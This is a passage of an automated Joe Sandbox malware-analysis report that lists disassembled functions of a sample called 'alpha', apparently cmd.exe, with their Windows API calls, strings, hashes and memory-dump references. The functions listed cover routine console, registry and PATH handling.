                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3114114779-0
                                                                                                                    • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                    • Instruction ID: 8121301643bbce0c4bd63a7c000571337ba898b44b73f03a4b7f0b1b27b389e5
                                                                                                                    • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                    • Instruction Fuzzy Hash: CF413B36A05B46CAE700DF65D4442AC7BB5FB48B59FA44035EE0D93B54DF38E415C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEA73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA77A
                                                                                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA7AF
                                                                                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA80E
                                                                                                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA839
                                                                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA850
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue$CloseErrorLastOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2240656346-0
                                                                                                                    • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                    • Instruction ID: f3c7435473db35800dde22b9f0d028a5d3f4a41a5b2ea3ae89dcf86f3d1160cf
                                                                                                                    • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                    • Instruction Fuzzy Hash: 4B319232A18A4582E750AF15E44447DFBB9FB88B92FE54034EA4E42754EF3CD845CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BED0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD01B8: _get_osfhandle.MSVCRT ref: 00007FF789BD01C4
                                                                                                                      • Part of subcall function 00007FF789BD01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD01D6
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BED0F9
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF789BED10F
                                                                                                                    • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF789BED166
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BED17A
                                                                                                                    • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF789BED18C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3008996577-0
                                                                                                                    • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                    • Instruction ID: 864d9ae6a2f2c86898961b2cc931efe8649407b48d0752b57817155381a8b44d
                                                                                                                    • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                    • Instruction Fuzzy Hash: B2212726B14A558AE700AF71E8501BDBBB0FB8DF46BA45125EE0D53B98EF38D045CB24
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE5770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateSemaphore
                                                                                                                    • String ID: _p0$wil
                                                                                                                    • API String ID: 1078844751-1814513734
                                                                                                                    • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                    • Instruction ID: 68d2b866a281ff35c7f8a571e8907582f8f3578550bfc3a55acd6c9468307f52
                                                                                                                    • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                    • Instruction Fuzzy Hash: CC51D6A1B1974A86EE21AF1484546BDEAB8FF84F92FF44435DA0D07B81EE7CE405C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEB89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF789BEB934
                                                                                                                    • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF789BD5085), ref: 00007FF789BEB9A5
                                                                                                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF789BD5085), ref: 00007FF789BEB9F7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                    • String ID: %WINDOWS_COPYRIGHT%
                                                                                                                    • API String ID: 1103618819-1745581171
                                                                                                                    • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                    • Instruction ID: 6a6e114450d5b99e45c6656b274a3e910cd2587d29c262f8ecc4be89d53ad20e
                                                                                                                    • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                    • Instruction Fuzzy Hash: B441946690879982EB10AF15941427DBBB4FB89F92FE55235DE8D03395EF3CE441C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BF0774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_wcslwr
                                                                                                                    • String ID: [%s]
                                                                                                                    • API String ID: 886762496-302437576
                                                                                                                    • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                                                    • Instruction ID: 6d9f26cc0568b4bf4b3370616055d1c6af86503e478ce8ade8b2148d9b945875
                                                                                                                    • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                                                    • Instruction Fuzzy Hash: AA317C32705B8A85EB21EF21D8543E9ABA0FB89B89F944035DE4D47755EF3CD645C310
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD32E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswspace
                                                                                                                    • String ID: off
                                                                                                                    • API String ID: 2389812497-733764931
                                                                                                                    • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                    • Instruction ID: 4c2d049b8317230979636cd0f06f7706517555cda64f6fa5b67687d150c12973
                                                                                                                    • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                    • Instruction Fuzzy Hash: 88216221E0C64B81FAA07F15A558279EEB0FF45FA6FE88034D90E47682EE2CE540C321
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE9308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                    • String ID: %s=%s$DPATH$PATH
                                                                                                                    • API String ID: 3731854180-3148396303
                                                                                                                    • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                    • Instruction ID: 0f46443378b8ac95238ad70f785bace2c89b26dcd92c0fd83b4df8ec5e125d4b
                                                                                                                    • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                    • Instruction Fuzzy Hash: F6218825B0964A80EA65BF95E444279EEB5BF80F82FE84135DD0E43395EE2CE448C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD8198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscmp
                                                                                                                    • String ID: *.*$????????.???
                                                                                                                    • API String ID: 3392835482-3870530610
                                                                                                                    • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                    • Instruction ID: 7ae7599313b2326dc7436233e8246460c9523255f46b0b843f8662c5cec9cb1c
                                                                                                                    • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                    • Instruction Fuzzy Hash: 5111E525B14A5A81E764AF26B444139FBB1FB48FC2FA85030CE8D57B85DE3DE441C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE9114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fprintf
                                                                                                                    • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                    • API String ID: 383729395-2781220306
                                                                                                                    • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                    • Instruction ID: dcb82ae52543d1199e1ab21eddd198ddc618c7d152358488ca0adf894f17a504
                                                                                                                    • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                    • Instruction Fuzzy Hash: 3011C12290864AA1EB55AF54E9041BDAA75FB44FF2FE05331DA3D432D4EF2CE489C351
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD09F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswspacewcschr
                                                                                                                    • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                                    • API String ID: 287713880-1183017076
                                                                                                                    • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                    • Instruction ID: a6f7f1a48d9c4e2b2ac0407d9743ec9d055e20fd48c7c22173785eecfe9145b5
                                                                                                                    • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                    • Instruction Fuzzy Hash: 6DF04421A18A5E81FA609F51A408179EDB0FF44F42BE69131D95F43254EF2CD440C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD04F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                                    • API String ID: 1646373207-2530943252
                                                                                                                    • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                    • Instruction ID: 76f9ef54ebf645bb6b86c2cfe5828b0b914fd861855f7ba2a7a045da788b0d3e
                                                                                                                    • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                    • Instruction Fuzzy Hash: 2601D661E09A4B92EA44AF11E895134AAB0FF45F72FE40735C93E027E0EF3CA581C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE73C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                    • API String ID: 1646373207-919018592
                                                                                                                    • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                    • Instruction ID: 5c7021d7326f1ad524cfa4acb9b6984ca50cccdd27f6790d00e794f8b70f7166
                                                                                                                    • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                                                    • Instruction Fuzzy Hash: 86F03A25A18B8992EA00AF12F844479EE70FF89FD2B989134DA4E03B18EF3CD485C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC1130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
